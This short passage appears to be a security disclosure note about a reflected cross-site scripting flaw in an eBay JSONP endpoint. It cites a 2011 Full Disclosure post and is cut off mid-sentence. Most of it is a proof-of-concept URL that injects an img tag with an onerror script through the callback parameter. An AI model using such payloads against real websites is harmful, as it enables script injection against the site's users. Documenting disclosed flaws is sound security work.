Returns: http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?

then: http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E

Can also use: http://seclists.org/fulldisclosure/2011/Feb/199

XSS th...